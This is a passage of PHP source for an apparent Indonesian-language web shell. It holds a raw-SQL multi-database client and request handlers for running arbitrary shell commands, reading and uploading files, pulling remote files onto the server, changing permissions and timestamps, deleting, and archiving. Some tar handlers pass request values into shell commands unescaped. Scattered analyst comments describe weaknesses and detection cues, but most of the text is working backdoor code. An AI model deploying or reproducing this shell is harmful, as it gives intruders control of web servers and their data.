case'zip': case'rar': case'tar': case'bz': case'gz': case'tgz': $ftype = fType('zip'); break;
case'jpg': case'png': case'bmp': case'gif': case'webp': case'psd': case'jpeg': case'ico': case'ai': case'xcf': case'cdr': case'tif': case'tif': case'tiff': case'eps': $ftype = fType('img'); break;
default: $ftype = fType('other');
}
// The archive checks below compare $ext case-sensitively, unlike the switch.
if($ext == 'zip'){
if(class_exists('ZipArchive')){
$zadd .= "";
}
}
if($ext == 'tar'){
$zadd .= "";
}
if(in_array($ext, ['gz','tgz'])){
$zadd .= "";
}
} else {
$ftype = fType('other');
}
switch($fcolor){
case 'text-danger' : $fselc = "-"; break;
case 'text-warning' : $fselc = ""; break;
case 'text-success' : $fselc = ""; break;
}
$fmtable .= "
|
|
|
".date('Y-m-d H:i:s', @filemtime($dir['full_path']))." |
{$owner['owner']}/{$owner['group']} |
{$flinks} |
{$fselc} |
";
}
}
$zadx ="";
if(class_exists("ZipArchive")){
$zadx .= "";
}
$fmtfoot .= "
|
|
|
Dir: {$cDir}, Files: {$cFile} |
";
} else {
$fmtable .= "| Direktori tidak berisi file apapun |
";
}
$fmtable .= "{$fmtfoot}
";
return $fmtable;
}
/**
 * Thin multi-driver database client.
 *
 * Wraps mysqli / ext-mysql, PostgreSQL, SQLite3, legacy SQLite, SQL Server
 * (sqlsrv / mssql), Oracle OCI8, ODBC and PDO behind one interface selected
 * by a lower-cased type string. query() forwards whatever SQL text it is
 * given straight to the driver: there is no parameter binding, statement
 * allow-list or escaping anywhere in this class, so it is only as safe as
 * the origin of the query string and the privileges of the supplied account.
 */
class DatabaseManager {
// Driver handle: an object or resource depending on $dbType.
private $connection;
// Lower-cased driver key ('mysql', 'pgsql', 'sqlite3', ...).
private $dbType;
/**
 * Open a connection for the given driver.
 *
 * For 'sqlite' and 'sqlite3' $host is a file path; for 'odbc' and 'pdo' it
 * is a DSN. The try/catch only rethrows.
 *
 * @throws Exception on an unknown type or when the connector returns a falsy value
 */
public function __construct($dbType, $host, $user = null, $password = null, $dbName = null) {
$this->dbType = strtolower($dbType);
try {
switch ($this->dbType) {
case 'mysql': $this->connection = $this->connectMySQL($host, $user, $password, $dbName); break;
case 'pgsql': $this->connection = $this->connectPostgres($host, $user, $password, $dbName); break;
case 'sqlite3': $this->connection = $this->connectSQLite3($host); break;
case 'sqlite': $this->connection = $this->connectSQLite($host); break;
case 'mssql': $this->connection = $this->connectMSSQL($host, $user, $password, $dbName); break;
case 'oracle': $this->connection = $this->connectOracle($host, $user, $password); break;
case 'odbc': $this->connection = $this->connectODBC($host, $user, $password); break;
case 'pdo': $this->connection = $this->connectPDO($host, $user, $password, $dbName); break;
default: throw new Exception("Unsupported database type: $this->dbType");
}
if (!$this->connection) {
throw new Exception("Failed to connect to the $this->dbType database.");
}
} catch (Exception $e) {
throw $e;
}
}
// Connect with mysqli when present, else the legacy mysql_* API; false if neither exists.
private function connectMySQL($host, $user, $password, $dbName) {
try {
if (class_exists('mysqli')) {
$conn = new mysqli($host, $user, $password, $dbName);
if ($conn->connect_error) {
throw new Exception("MySQL connection failed: " . $conn->connect_error);
}
return $conn;
} elseif (function_exists('mysql_connect')) {
$conn = @mysql_connect($host, $user, $password);
if ($conn && $dbName) {
mysql_select_db($dbName, $conn);
}
return $conn;
}
return false;
} catch (Exception $e) {
throw $e;
}
}
// Build a libpq connection string; "host:port" is split on the first two ':' parts.
// The values are interpolated without quoting, so a space or quote in any
// of them changes how the string is parsed.
private function connectPostgres($host, $user, $password, $dbName) {
$hostStr = strpos($host, ':') !== false
? "host=" . explode(':', $host)[0] . " port=" . explode(':', $host)[1]
: "host=$host";
$dbString = "$hostStr user=$user password=$password";
if ($dbName) {
$dbString .= " dbname=$dbName";
}
return function_exists('pg_connect') ? @pg_connect($dbString) : false;
}
// Open a SQLite3 database file; false when the class is unavailable.
private function connectSQLite3($filePath) {return class_exists('SQLite3') ? new SQLite3($filePath) : false;}
// Open a database file through the legacy sqlite_* API; false when unavailable.
private function connectSQLite($filePath) {return function_exists('sqlite_open') ? @sqlite_open($filePath) : false;}
// Connect to SQL Server via sqlsrv when present, else the legacy mssql_* API.
private function connectMSSQL($host, $user, $password, $dbName) {
if (function_exists('sqlsrv_connect')) {
$connectionInfo = ["UID" => $user, "PWD" => $password];
if ($dbName) {
$connectionInfo["Database"] = $dbName;
}
return @sqlsrv_connect($host, $connectionInfo);
} elseif (function_exists('mssql_connect')) {
$conn = @mssql_connect($host, $user, $password);
if ($conn && $dbName) {
mssql_select_db($dbName, $conn);
}
return $conn;
}
return false;
}
// OCI8 connect; $host is passed as the connection string argument.
private function connectOracle($host, $user, $password) {return function_exists('oci_connect') ? @oci_connect($user, $password, $host) : false;}
// ODBC connect using a caller-supplied DSN.
private function connectODBC($dsn, $user, $password) {return function_exists('odbc_connect') ? @odbc_connect($dsn, $user, $password) : false;}
// PDO connect; ";dbname=..." is appended to the DSN when a database name is given.
private function connectPDO($dsn, $user, $password, $dbName) {
try {
$dsn = $dbName ? "$dsn;dbname=$dbName" : $dsn;
return class_exists('PDO') ? new PDO($dsn, $user, $password) : false;
} catch (PDOException $e) {
throw $e;
}
}
/**
 * Describe the columns of a result handle.
 *
 * @return array ['field_count' => int, 'field_names' => string[]]
 * @throws Exception for an unsupported driver type
 */
public function getFieldInfo($result) {
try {
$fieldInfo = [
'field_count' => 0,
'field_names' => []
];
switch ($this->dbType) {
case 'mysql':
if (class_exists('mysqli')) {
$fieldInfo['field_count'] = $result->field_count;
while ($field = $result->fetch_field()) {$fieldInfo['field_names'][] = $field->name;}
// NOTE(review): the legacy extension's function is, as far as I know,
// mysql_fetch_field (singular), so this test may never be true. Confirm.
} elseif (function_exists('mysql_fetch_fields')) {
$fieldInfo['field_count'] = mysql_num_fields($result);
for ($i = 0; $i < $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = mysql_field_name($result, $i);}
}
break;
case 'pgsql': $fieldInfo['field_count'] = pg_num_fields($result); for ($i = 0; $i < $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = pg_field_name($result, $i);} break;
case 'sqlite3': $fieldInfo['field_count'] = $result->numColumns(); for ($i = 0; $i < $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = $result->columnName($i);} break;
case 'sqlite': $fieldInfo['field_count'] = sqlite_num_fields($result); for ($i = 0; $i < $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = sqlite_field_name($result, $i);} break;
case 'mssql': if (function_exists('sqlsrv_field_metadata')) { $metadata = sqlsrv_field_metadata($result); $fieldInfo['field_count'] = count($metadata); foreach ($metadata as $field) {$fieldInfo['field_names'][] = $field['Name'];}} break;
// Oracle and ODBC column indexes are 1-based, hence the different loop bounds.
case 'oracle': $fieldInfo['field_count'] = oci_num_fields($result); for ($i = 1; $i <= $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = oci_field_name($result, $i);} break;
case 'odbc': $fieldInfo['field_count'] = odbc_num_fields($result); for ($i = 1; $i <= $fieldInfo['field_count']; $i++) {$fieldInfo['field_names'][] = odbc_field_name($result, $i);} break;
case 'pdo': $fieldInfo['field_count'] = $result->columnCount(); for ($i = 0; $i < $fieldInfo['field_count']; $i++) {$columnMeta = $result->getColumnMeta($i); $fieldInfo['field_names'][] = $columnMeta['name'];} break;
default: throw new Exception("getFieldInfo not supported for database type: $this->dbType");
}
return $fieldInfo;
} catch (Exception $e) {
throw $e;
}
}
/**
 * Number of rows changed by the last statement.
 *
 * Some drivers read this from the connection and ignore $result; others
 * need the statement/result handle. Returns null when a 'mysql' or 'mssql'
 * connection has no matching extension function (the case just breaks).
 */
public function affectedRows($result = null) {
try {
switch ($this->dbType) {
case 'mysql': if (class_exists('mysqli')) { return $this->connection->affected_rows;} elseif (function_exists('mysql_affected_rows')) {return mysql_affected_rows($this->connection);}break;
case 'pgsql': return pg_affected_rows($result);
case 'sqlite3': return $this->connection->changes();
case 'sqlite': return sqlite_changes($this->connection);
case 'mssql': if (function_exists('sqlsrv_rows_affected')) { return sqlsrv_rows_affected($result); } elseif (function_exists('mssql_rows_affected')) { return mssql_rows_affected($this->connection); } break;
case 'oracle': return oci_num_rows($result);
case 'odbc': return odbc_num_rows($result);
case 'pdo': return $result->rowCount();
default: throw new Exception("affectedRows not supported for database type: $this->dbType");
}
} catch (Exception $e) {
throw $e;
}
}
/**
 * Fetch the next row of $result as an associative array.
 *
 * The 'mysql' case uses the object API only and 'mssql' uses sqlsrv only;
 * the legacy fallbacks used elsewhere in the class are not mirrored here.
 */
public function fetchRow($result) {
try {
switch ($this->dbType) {
case 'mysql': return $result->fetch_assoc(); break;
case 'pgsql': return pg_fetch_assoc($result); break;
case 'sqlite3': return $result->fetchArray(SQLITE3_ASSOC); break;
case 'sqlite': return sqlite_fetch_array($result, SQLITE_ASSOC); break;
case 'mssql': return sqlsrv_fetch_array($result, SQLSRV_FETCH_ASSOC); break;
case 'oracle': return oci_fetch_assoc($result); break;
case 'odbc': return odbc_fetch_array($result); break;
case 'pdo': return $result->fetch(PDO::FETCH_ASSOC); break;
default: throw new Exception("fetchRow not supported for database type: $this->dbType");
}
} catch (Exception $e) {
throw $e;
}
}
/**
 * Number of rows in a result.
 *
 * NOTE(review): the 'sqlite3' case returns numColumns(), i.e. the column
 * count rather than a row count. Oracle deliberately throws.
 */
public function numRows($result) {
try {
switch ($this->dbType) {
case 'mysql': return $result->num_rows;
case 'pgsql': return pg_num_rows($result);
case 'sqlite3': return $result->numColumns();
case 'sqlite': return sqlite_num_rows($result);
case 'mssql': return sqlsrv_num_rows($result);
case 'oracle': throw new Exception("numRows not directly supported for Oracle. Use a COUNT query instead.");
case 'odbc': return odbc_num_rows($result);
case 'pdo': return $result->rowCount();
default: throw new Exception("numRows not supported for database type: $this->dbType");
}
} catch (Exception $e) {
throw $e;
}
}
/**
 * Send a SQL string to the active driver and return its result handle.
 *
 * The text is executed verbatim. Driver error messages are copied into the
 * exception message, so whatever displays that exception also discloses
 * server-side error detail.
 *
 * NOTE(review): the 'mysql' and 'mssql' cases have no break or return after
 * their if/elseif, so when neither extension function exists control falls
 * through into the next case ('pgsql' and 'oracle' respectively).
 *
 * @throws Exception when the driver reports failure or the type is unknown
 */
public function query($query) {
try {
switch ($this->dbType) {
case 'mysql':
if (class_exists('mysqli')) {
$result = $this->connection->query($query);
if ($result === false) {throw new Exception("MySQL query failed: " . $this->connection->error);}
return $result;
} elseif (function_exists('mysql_query')) {
$result = mysql_query($query, $this->connection);
if ($result === false) {throw new Exception("MySQL query failed: " . mysql_error($this->connection));}
return $result;
}
case 'pgsql':
$result = pg_query($this->connection, $query);
if ($result === false) {throw new Exception("PostgreSQL query failed: " . pg_last_error($this->connection));}
return $result;
case 'sqlite3':
$result = $this->connection->query($query);
if ($result === false) {throw new Exception("SQLite3 query failed: " . $this->connection->lastErrorMsg());}
return $result;
case 'sqlite':
$result = sqlite_query($this->connection, $query);
if ($result === false) {throw new Exception("SQLite query failed: " . sqlite_error_string(sqlite_last_error($this->connection)));}
return $result;
case 'mssql':
if (function_exists('sqlsrv_query')) {
$result = sqlsrv_query($this->connection, $query);
if ($result === false) {throw new Exception("MSSQL query failed: " . print_r(sqlsrv_errors(), true));}
return $result;
} elseif (function_exists('mssql_query')) {
$result = mssql_query($query, $this->connection);
if ($result === false) {throw new Exception("MSSQL query failed.");}
return $result;
}
case 'oracle':
// Oracle is two-step: parse the statement, then execute it.
$stmt = oci_parse($this->connection, $query);
if (!$stmt) {throw new Exception("Oracle query parsing failed.");}
if (!oci_execute($stmt)) {
$error = oci_error($stmt);
throw new Exception("Oracle query execution failed: " . $error['message']);
}
return $stmt;
case 'odbc':
$result = odbc_exec($this->connection, $query);
if ($result === false) {throw new Exception("ODBC query failed: " . odbc_errormsg($this->connection));}
return $result;
case 'pdo':
$result = $this->connection->query($query);
if ($result === false) {throw new Exception("PDO query failed: " . implode(", ", $this->connection->errorInfo()));}
return $result;
default: throw new Exception("Query not supported for database type: $this->dbType");
}
} catch (Exception $e) {
throw $e;
}
}
/**
 * Close the connection using the driver's own call.
 *
 * PDO has no close method, so the handle is set to null and nothing is
 * returned for that case; the other cases return the driver's result.
 *
 * @throws Exception for an unknown driver type
 */
public function close() {
switch ($this->dbType) {
case 'mysql': return class_exists('mysqli') ? $this->connection->close() : mysql_close($this->connection); break;
case 'pgsql': return pg_close($this->connection); break;
case 'sqlite3': return $this->connection->close(); break;
case 'sqlite': return sqlite_close($this->connection); break;
case 'mssql': return function_exists('sqlsrv_close') ? sqlsrv_close($this->connection) : mssql_close($this->connection); break;
case 'oracle': return oci_close($this->connection); break;
case 'odbc': return odbc_close($this->connection); break;
case 'pdo': $this->connection = null; break;
default: throw new Exception("close not supported for database type: $this->dbType");
}
}
}
if(isset($_GET['act'])){
if($_GET['act'] == 'info'){
header("Content-type: application/json; charset=utf-8");
echo json_encode((object) serverSecInfo());
die();
} else if($_GET['act'] == 'command'){
if(isset($_POST['cmd'])){
if(!empty($_POST['cmd']) || strlen($_POST['cmd'])>1){
$sendreq = perintahnya($_POST['cmd'], $_POST['xpath']);
$outs['stdout'] = base64_encode("". @iconv("UTF-8", "ISO-8859-1//IGNORE", addcslashes("".base64_decode($sendreq['userhost']).":".base64_decode($sendreq['path'])."# {$_POST['cmd']}
".htmlspecialchars(base64_decode($sendreq['stdout']))."","\t\0"))."");
$outs['path'] = $sendreq['path'];
$outs['userhost'] = $sendreq['userhost'];
} else {
$outs['stdout'] = base64_encode("Sebenernya, apa sih yang anda perintahkan?
");
$outs['path'] = base64_encode($_SESSION['path']);
$outs['userhost'] = base64_encode('0');
}
header("Content-type: application/json; charset=utf-8");
echo json_encode($outs);
clearstatcache();
die();
}
} else if($_GET['act'] == 'mkdir'){
$ndir = isset($_POST['xdir']) && !empty($_POST['xdir']) ? $_POST['xdir'] : '';
if(!empty($ndir)){
$xpath = $_POST['xpath']."/".$ndir;
if($_POST['xtype'] == 'dir'){
if(!@is_dir($xpath)){
if(@mkdir($xpath, 0755, true)){
$outs = "Direktori berhasil dibuat!";
} else {
$sendreq = perintahnya("mkdir ".$xpath, $_POST['xpath']);
$outs = isset($sendreq['stdout']) && strlen($sendreq['stdout'])>2 ? "Direktori berhasil dibuat!" : "Gagal membuat direktori!";
}
} else {
$outs = "Direktori sudah ada!";
}
} else {
if($_POST['xtype'] == 'file'){
if(!file_exists($xpath)){
if(AvFunc(array('fopen','fclose'))){
$fp = @fopen($xpath, 'w');
if($fp){
$xpath = "ok, tinggal di edit..";
fclose($fp);
}
$outs = "File berhasil dibuat!";
} else if(AvFunc(array('file_put_contents'))){
file_put_contents($xpath, "");
$outs = file_exists($xpath) ? "File berhasil dibuat!" : "Gagal membuat file!";
}
} else {
$outs = "File sudah ada, cobalah membuat file dengan nama yang berbeda!";
}
} else {
$outs = "Anda mw buat apa??";
}
}
} else {
$outs = "Path tidak valid!";
}
echo $outs;
die();
} else if($_GET['act'] == 'readfile'){
if(isset($_POST['xpath']) && !empty($_POST['xpath'])){
$xpath = $_POST['xpath'];
if(@is_readable($xpath)){
$outs = '';
if(@filesize($xpath)>0){
if(AvFunc(array('fopen','fread','fclose','feof'))){
$fp = @fopen($xpath, 'r');
if($fp){
while(!@feof($fp)){$outs .= htmlspecialchars(@fread($fp, @filesize($xpath)));}
@fclose($fp);
}
} else if(AvFunc(array('file_get_contents'))){
$outs = @file_get_contents($df);
} else {
$outs = "File {$_GET['entry']} gak bisa dibaca!";
}
} else {
if(AvFunc(array('file_get_contents'))){$outs = @file_get_contents($df);}
}
} else {
$outs = "File {$_GET['entry']} gak bisa dibaca!";
}
} else {
$outs = "File yang mw dibaca, gk ada!";
}
echo $outs;
die();
} else if($_GET['act'] == 'uploader'){
// Analyst note: 'uploader' handler (server-side fetch of a remote file).
// All three inputs come straight from the POST body: the destination directory
// (xpath), the source URL (xurl) and the name to store the file under (xname).
// The only validation is is_writable() on the directory, FILTER_VALIDATE_URL on
// the URL and a non-empty check on the name; nothing confines the destination
// to a base directory or restricts the file extension.
// transferFile() is defined outside this chunk; from the arguments it presumably
// downloads xurl into xpath/xname (confirm against its definition).
// Detection: an outbound fetch initiated by the web-server PHP process, followed
// by a new file appearing in a writable web directory.
$xpath = $_POST['xpath'];
$xurl = $_POST['xurl'];
$xname = $_POST['xname'];
if(is_writable($xpath)){
if(empty($xurl) || !filter_var($xurl, FILTER_VALIDATE_URL)){$errs[] = "Url tidak valid!";}
if(empty($xname)){$errs[] = "Nama file tidak boleh kosong!";}
if(isset($errs)){
$outs[] = $errs;
} else {
$outs = transferFile($xurl, $xpath, $xname);
}
} else {
$outs[] = "Gak bisa upload file di direktori ini!";
}
// Status lines are echoed back to the client and the request ends here.
echo isset($outs) ? implode('
', $outs) : 'Invalid file!';
die();
} else if($_GET['act'] == 'upload'){
@ini_set('output_buffering', 0);
$xpath = $_POST['xpath'];
if(is_writable($xpath)){
for($cf=0; $cf 0){
$fname = @$_FILES['xfile']['name'][$cf];
$ftmp = @$_FILES['xfile']['tmp_name'][$cf];
if(AvFunc(array('move_uploaded_file'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$outs[] = @move_uploaded_file($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else if(AvFunc(array('file_put_contents', 'file_get_contents'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$upfiles = @file_put_contents($xpath."/".$fname, @file_get_contents(@$ftmp));
if($upfiles){
$outs[] = file_exists($xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else {
$outs[] = $fname." failed!";
}
} else if(AvFunc(array('copy'))){
if(file_exists($xpath."/".$fname)){@unlink($xpath."/".$fname);}
$outs[] = @copy($ftmp, $xpath."/".$fname) ? $fname." uploaded!" : $fname." failed!";
} else {
$outs[] = $fname." failed!";
}
}
}
} else {
$outs[] = "Gak bisa upload file di direktori ini!";
}
echo isset($outs) ? implode('
', $outs) : 'Invalid file!';
die();
} else if($_GET['act'] == 'rename'){
// Analyst note: 'rename' handler of the file manager.
// Old and new paths are built by plain concatenation of POST fields
// (xpath + oname, xpath + xname). There is no normalisation or base-directory
// check, so the call can touch any path the PHP process is allowed to rename.
// The '@' operator suppresses the warning rename() would raise on failure, so
// failed attempts are not reported through PHP's error handling.
// xtype is not used for the operation itself; it is only echoed back, unescaped,
// in the status text.
if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['oname'])){
$ren = @rename($_POST['xpath'].'/'.$_POST['oname'], $_POST['xpath'].'/'.$_POST['xname']);
$outss = $ren == true ? 'Berhasil mengubah nama '.$_POST['xtype'] : 'Gagal mengubah nama '.$_POST['xtype'];
echo $outss;
die();
}
} else if($_GET['act'] == 'touch'){
if(isset($_POST['xtype'], $_POST['xpath'], $_POST['xname'], $_POST['xtime'])){
$time = strtotime($_POST['xtime']);
$fd = $_POST['xpath'].'/'.$_POST['xname'];
if($time){
$outs = !touch($fd, $time, $time) ? 'Fail!' : 'Touched!';
} else {
$outs = 'Format waktu tidak valid!';
}
clearstatcache();
echo $outs;
die();
}
} else if($_GET['act'] == 'chmod'){
if(isset($_POST['xperm']) && !empty($_POST['xperm'])){
$xperm = $_POST['xperm'];
$xtype = $_POST['xtype'];
$xname = $_POST['xname'];
$xpath = $_POST['xpath'];
$perms = 0;
for($i=strlen($xperm)-1;$i>=0;--$i){
$perms += (int)$xperm[$i]*pow(8, (strlen($xperm)-$i-1));
}
$cm = @chmod("{$xpath}/{$xname}", $perms);
$outss = $cm == true ? 'chmod '.$xtype.': '.$xname.', berhasil!' : 'chmod '.$xtype.': '.$xname.', gagal!';
} else {
$outss = 'Permission tidak boleh kosong!';
}
clearstatcache();
echo $outss;
die();
} else if($_GET['act'] == 'copy'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'], $_POST['xtarget'])){
$df = rtrim($_POST['xpath'],'/') .'/'. $_POST['xname'];
$target = rtrim($_POST['xtarget'], '/');
if(!@is_dir($target)){
echo 'Tujuan ('. $target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('. $target.') is not writeable!';
die();
}
if($_POST['xtype'] == 'file'){
if(file_exists($df)){
$outss = @copy($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di copy!' : $_POST['xname'].' gagal di copy!';
} else {
$outss = $_POST['xname'].' sudah ada!';
}
} else if($_POST['xtype'] == 'dir'){
if(gandakanDir($df, $target.'/'.$_POST['xname'])){
$outss = $_POST['xname'].' berhasil di copy!';
} else {
$outss = $_POST['xname'].' gagal di copy!';
}
}
} else {
$outss = 'permintaan tidak lengkap!';
}
echo $outss;
die();
} else if($_GET['act'] == 'cut'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'], $_POST['xtarget'])){
$df = rtrim($_POST['xpath'],'/') .'/'. $_POST['xname'];
$target = rtrim($_POST['xtarget'], '/');
if(!@is_dir($target)){
echo 'Tujuan ('. $target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('. $target.') is not writeable!';
die();
}
if($_POST['xtype'] == 'file'){
if(file_exists($df)){
$outss = @rename($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di pindahkan!' : $_POST['xname'].' gagal di pindahkan!';
} else {
$outss = $_POST['xname'].' sudah ada!';
}
} else if($_POST['xtype'] == 'dir'){
if(@is_dir($df)){
$outss = @rename($df, $target.'/'.$_POST['xname']) ? $_POST['xname'].' berhasil di pindahkan!' : $_POST['xname'].' gagal di pindahkan!';
} else {
$outss = $df.' tidak ditemukan!';
}
}
} else {
$outss = 'permintaan tidak lengkap!';
}
echo $outss;
die();
} else if($_GET['act'] == 'del'){
if(isset($_POST['xtype'], $_POST['xname'], $_POST['xpath'])){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
if($_POST['xtype'] == 'dir' && @is_dir($df)){
if(file_exists($df)){
xrmdir($df);
}
$outss = file_exists($df) ? "Hapus dir gagal!" : "Hapus dir sukses!";
} else if($_POST['xtype'] == 'file' && @is_file($df)){
if(file_exists($df)){
@unlink($df);
}
$outss = file_exists($df) ? "Hapus file gagal!" : "Hapus file sukses!";
}
echo $outss;
die();
}
} else if($_GET['act'] == 'tar'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? current($fnm).'.tar' : $_POST['xname'].'.tar';
if(file_exists($newname)){
unlink($_POST['xpath'].'/'.$newname);
}
perintahnya("tar cf {$newname} {$_POST['xname']}", $_POST['xpath']);
$outs = file_exists($_POST['xpath']."/".$newname) ? "archived success" : "archived failed";
echo $outs;
die();
} else if($_GET['act'] == 'tgz'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? current($fnm).'.tar.gz' : $_POST['xname'].'.tar.gz';
if(file_exists($newname)){
unlink($_POST['xpath'].'/'.$newname);
}
perintahnya("tar czf {$newname} {$_POST['xname']}", $_POST['xpath']);
$outs = file_exists($_POST['xpath']."/".$newname) ? "archived success" : "archived failed";
echo $outs;
die();
} else if($_GET['act'] == 'zip'){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$df = $_POST['xpath'] .'/'. $_POST['xname'];
$fnm = explode('.', $_POST['xname']);
$newname = count($fnm)>0 ? $_POST['xpath']."/".current($fnm) : $df;
if(file_exists($newname.'.zip')){
unlink($_POST['xpath'].'/'.$newname.'.zip');
}
if($zip->open($newname.'.zip', ZipArchive::CREATE)){
if(@is_dir($df)){
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($df.'/', FilesystemIterator::SKIP_DOTS));
foreach($files as $key => $value){
$zip->addFile(realpath($key), $key);
}
} else {
$zip->addFile($df);
}
$outss = $_POST['xname'].' zipped!';
} else {
$outss = 'Tidak dapat menganalisa dir/file';
}
$zip->close();
} else {
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'untar'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
perintahnya("tar xf {$_POST['xname']} -C {$_POST['xpath']}", $_POST['xpath']);
try {
$phar = new PharData($_POST['xname']);
foreach ($phar as $file) {
$targetPath = $_POST['xpath'] . $file->getFilename();
if (file_exists($targetPath)) {
echo "File {$file->getFilename()} sudah ada, melewati...\n";
continue;
}
$phar->extractTo($_POST['xpath'], [$file->getFilename()], true);
echo "File {$file->getFilename()} berhasil diekstrak.\n";
}
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
die();
} else if($_GET['act'] == 'untgz'){
$df = $_POST['xpath'] .'/'. $_POST['xname'];
perintahnya("tar xzf {$_POST['xname']} -C {$_POST['xpath']}", $_POST['xpath']);
try {
$phar = new PharData($_POST['xname']);
foreach ($phar as $file) {
$targetPath = $_POST['xpath'] . $file->getFilename();
if (file_exists($targetPath)) {
echo "File {$file->getFilename()} sudah ada, melewati...\n";
continue;
}
$phar->extractTo($_POST['xpath'], [$file->getFilename()], true);
echo "File {$file->getFilename()} berhasil diekstrak.\n";
}
} catch (Exception $e) {
echo "Error: " . $e->getMessage();
}
die();
} else if($_GET['act'] == 'unzip'){
// Analyst note: 'unzip' handler.
// The archive location (xpath/xname) and the extraction directory (xpath) both
// come from the POST body. extractTo() is called once for the whole archive,
// with no per-entry check and no listing of what was written.
// Detection: a burst of file creations by the PHP process under one directory,
// shortly after an archive was uploaded or fetched there.
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$df = $_POST['xpath'] .'/'. $_POST['xname'];
if($zip->open($df)) {
$zip->extractTo($_POST['xpath']);
$outss = $_POST['xname'].' extracted!';
$zip->close();
} else {
$outss = $_POST['xname'].' gagal di unzip!';
}
} else {
// Reported when the zip extension is not loaded.
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'mass_zip'){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'zip_'.date('U')).'.zip';
if($zip->open($zipfile, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE){
$outss = "Tidak dapat membuat file ZIP: {$zipfile}";
}
$hasils = false;
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item) {
$itemPath = $item['name'];
if($item['type'] == 'dir'){
addDirToZip($zip, $itemPath, $_POST['xpath']);
$hasils = true;
} else if ($item['type'] == 'file') {
$zip->addFile($itemPath, $item['name']);
$hasils = true;
}
}
$outss = $hasils == true ? 'ZIP file berhasil dibuat: '.$zipfile : 'Item tidak valid atau tidak ditemukan!';
$zip->close();
} else {
$outss = 'module ZipArchive tidak terinstall!';
}
echo $outss;
die();
} else if($_GET['act'] == 'mass_tar'){
$path = rtrim($_POST['xpath'], '/');
$tarfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'tar_'.date('U')).'.tar';
$Command = "tar cf {$tarfile}";
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item){
$itemPath = $path . '/' . $item['name'];
if (file_exists($itemPath)) {
$Command .= ' '.escapeshellarg($item['name']);
}
}
perintahnya($Command, $path);
echo file_exists($path.'/'.$tarfile) ? "File TAR berhasil dibuat: {$tarfile}" : "Item tidak valid atau tidak ditemukan";
die();
} else if($_GET['act'] == 'mass_tgz'){
$path = rtrim($_POST['xpath'], '/');
$tgzfile = (isset($_POST['xname']) && !empty(trim($_POST['xname'])) ? trim($_POST['xname']) : 'tgz_'.date('U')).'.tar.gz';
$Command = "tar czf {$tgzfile}";
$xdata = json_decode(base64_decode($_POST['xdata']),true);
foreach ($xdata as $ki => $item){
$itemPath = $path . '/' . $item['name'];
if (file_exists($itemPath)) {
$Command .= ' '.escapeshellarg($item['name']);
}
}
perintahnya($Command, $path);
echo file_exists($path.'/'.$tgzfile) ? "File TAR.GZ berhasil dibuat: {$tgzfile}" : "Item tidak valid atau tidak ditemukan";
die();
} else if($_GET['act'] == 'mass_copy'){
$path = rtrim($_POST['xpath'], '/');
$target = rtrim($_POST['xtarget'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
if(!@is_dir($target)){
echo 'Tujuan ('.$target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('.$target.') is not writeable!';
die();
}
$hasils[] = '';
foreach($xdata as $ki => $item){
$sourcePath = $path.'/'.$item['name'];
$targetPath = $target.'/'.$item['name'];
if($item['type'] === 'file'){
if(file_exists($sourcePath)){
if(@copy($sourcePath, $targetPath)){
$hasils[] = 'Copy file berhasil!';
} else {
$hasils[] = 'Copy file gagal!';
}
} else {
$hasils[] = 'Copy file gagal!';
}
} else if($item['type'] === 'dir'){
if(gandakanDir($sourcePath, $targetPath)){
$hasils[] = 'Copy dir berhasil!';
} else {
$hasils[] = 'Copy dir gagal!';
}
}
}
$outs = implode(', ', array_unique($hasils));
echo $outs;
die();
} else if($_GET['act'] == 'mass_cut'){
$path = rtrim($_POST['xpath'], '/');
$target = rtrim($_POST['xtarget'], '/');
$xdata = json_decode(base64_decode($_POST['xdata']),true);
if(!@is_dir($target)){
echo 'Tujuan ('.$target.') bukanlah sebuah direktori!';
die();
}
if(!@is_writable($target)){
echo 'Tujuan ('.$target.') is not writeable!';
die();
}
$hasils[] = '';
foreach($xdata as $ki => $item){
$sourcePath = $path.'/'.$item['name'];
$targetPath = $target.'/'.$item['name'];
if($item['type'] === 'file'){
if(file_exists($sourcePath)){
$isCopyF = @copy($sourcePath, $targetPath);
if($isCopyF){
@unlink($sourcePath);
